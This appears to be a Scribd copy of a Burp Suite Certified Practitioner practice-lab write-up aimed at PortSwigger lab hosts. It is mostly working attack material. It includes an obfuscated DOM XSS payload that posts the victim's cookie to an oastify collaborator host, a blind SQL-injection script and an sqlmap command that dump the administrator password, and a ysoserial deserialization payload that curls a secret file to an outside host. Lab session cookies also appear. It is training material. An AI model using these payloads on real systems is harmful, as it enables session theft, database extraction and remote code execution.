KEMBAR78
Practice Lab 1 | PDF | Http Cookie | User (Computing)
Scribd
Upload
8 views4 pages

Practice Lab 1

Uploaded by

riodaniel66
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
8 views4 pages

Practice Lab 1

Uploaded by

riodaniel66
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

_______________________________________

BURPSUITE CERTIFIED PRACTICIONER EXAM


Practice Lab 1

Leonardo Tamiano (Hexdump)


_______________________________________

Table of Contents
_________________

1. Step 1 - DOM XSS to steal session cookie


2. Step 2 - Blind SQLi to obtain administrator password
3. Step 3 - Insecure Deserialization to read secret

1 Step 1 - DOM XSS to steal session cookie


==========================================

DOM XSS on search functionality can be triggered with the following


payload
,----
| "};alert(1)//
`----

There is some basic filtering mechanism which does not allow you to
perform fetches with document.cookie. To bypass this, simply use
`eval' with `atob'
,----
| "};eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))//
`----

Code to steal user cookie


,----
| btoa("fetch('https://eq84n6beriq08tqwsecr8wj73y9pxhl6.oastify.com', { method:
'POST', mode: 'no-cors', body:document.cookie });")
| btoa("fetch('https://tolutj74wjsasnrdhdw4s2zmldr4fu3j.oastify.com', { method:
'POST', mode: 'no-cors', body:document.cookie });")
`----

Final DOM XSS payload


,----
|
"};eval(atob('ZmV0Y2goJ2h0dHBzOi8vdG9sdXRqNzR3anNhc25yZGhkdzRzMnptbGRyNGZ1M2oub2Fzd
GlmeS5jb20nLCB7IG1ldGhvZDogJ1BPU1QnLCBtb2RlOiAnbm8tY29ycycsIGJvZHk6ZG9jdW1lbnQuY29v
a2llIH0pOw'))//
`----

Send this to the victim

,----
| <script>
| document.location="https://0afd0092044ff06780e5084e000000aa.web-security-
academy.net/?SearchTerm=%22%7D%3Beval%28atob
%28%27ZmV0Y2goJ2h0dHBzOi8vdG9sdXRqNzR3anNhc25yZGhkdzRzMnptbGRyNGZ1M2oub2FzdGlmeS5jb
20nLCB7IG1ldGhvZDogJ1BPU1QnLCBtb2RlOiAnbm8tY29ycycsIGJvZHk6ZG9jdW1lbnQuY29va2llIH0p
Ow%27%29%29%2F%2F"
| </script>
`----

----------------------------------------------------------------------

Stole cookie victim


,----
| fpHJEUxrA2sErKVEbg1ut4cxI70eJLW5
`----

2 Step 2 - Blind SQLi to obtain administrator password


======================================================

Within the `advanced search' feature, we find an SQL injection within


the `organize_by' parameter.

Payload to determine length of administrator password


,----
| Author||(SELECT CASE WHEN LENGTH(password) > 15 THEN pg_sleep(2) ELSE
pg_sleep(0) END FROM users WHERE username='administrator')
`----

Payload to extract administrator password


,----
| Author||(SELECT CASE WHEN SUBSTRING(password,0,1)='a' THEN pg_sleep(2) ELSE
pg_sleep(0) END FROM users WHERE username='administrator')
`----

----------------------------------------------------------------------

Script to automate the attack

,----
| import requests
| from urllib3.exceptions import InsecureRequestWarning
|
| ALPHABET = "0123456789" + "abcdefghijklmnopqrstuvwxyz" +
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
| # --------------------------
|
| def sql2bool(sql_payload):
| url = "https://0a4d00080460079481213e9800280092.web-security-academy.net/
advanced_search"
| params = {
| "SearchTerm": "a",
| "organize_by": sql_payload,
| "blogArtist":"c"
| }
| headers = { "Cookie":
"_lab=46%7cMCwCFCS9bCUEz2Ed4jmTpsblEQG5ew33AhQLGVRL8qcd0T5tzLrpYFUrElHue2lWjzk6ELrZ
9JRtohXCdy6ulwiitAr%2bZU6qJtK%2bv40O%2bEMHsfQzNkbDUmkcME4iy%2fNPuYDeQ%2fhRptx01zR
%2f1NRfSalrs1%2bRsGkI5%2b7cvJwjn1BYzqs%3d;
session=fpHJEUxrA2sErKVEbg1ut4cxI70eJLW5" }
|
| try:
| r = requests.get(url, headers=headers, params=params, timeout=2,
proxies={"https": "127.0.0.1:8080"}, verify=False)
| return False
| except Exception:
| return True
|
| # --------------------------
|
| def get_password():
| global ALPHABET
|
| username = "administrator"
| password_length = 16
|
| print(f"[INFO] - Password for username: {username} has {password_length}
length")
| print(f"[INFO] - Password for {username} is ", end="")
| password = ""
| for i in range(15, password_length+1):
| for c in ALPHABET:
| sql_payload = f"Author||(SELECT CASE WHEN SUBSTRING(password,
{i},1)='{c}' THEN pg_sleep(2) ELSE pg_sleep(0) END FROM users WHERE
username='administrator')"
| if sql2bool(sql_payload):
| password += c
| print(c, end="", flush=True) # to print in a cool way
| break
| print("\n", end="")
| return password
|
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
| get_password()
`----

----------------------------------------------------------------------

Exploit with `sqlmap'

,----
| sqlmap -u "https://0a330075048e756080dbb75400610083.web-security-academy.net/
advanced_search?SearchTerm=&organize_by=*&blogArtist=" --cookie="_lab=46%7cMCwCFEk
%2bONwqfNu0e4LqBFv1LBJ3nDtDAhRxtsaDX13ZHiTOAZC76VrJ4hRc
%2bKNVnuH1WxSpguvCAxEXk5J5CU1RF8zdmKZ1Cvqjk8h6O6nnbA7AgGqoL1W7dfe8xb
%2fBscrxazr7%2bCBjLwXg93hfH9Fs34ibOVdbAzv46FZDNz8KZrY
%3d;session=rEIPSZruwu1EfXOZ339ehswlfg098JAM" -p 'organize_by' -D public -T users
--dump --batch --level=5 --risk=3
`----

3 Step 3 - Insecure Deserialization to read secret


==================================================

Once logged as admin we obtain the cookie `admin-prefs'. This cookie


is deserialized server-side. This can be used to trigger RCE on the
server.

Notice that the payload must first be `GZIPED'

Payload with `ysoserial'

,----
| java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-
UNNAMED
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED
--add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-
UNNAMED -jar ysoserial-all.jar CommonsCollections3 'curl --data
@/home/carlos/secret https://skgihk5slwke27kams652adlxc33rzfo.oastify.com/?' | gzip
| base64 -w0 > out
`----

You might also like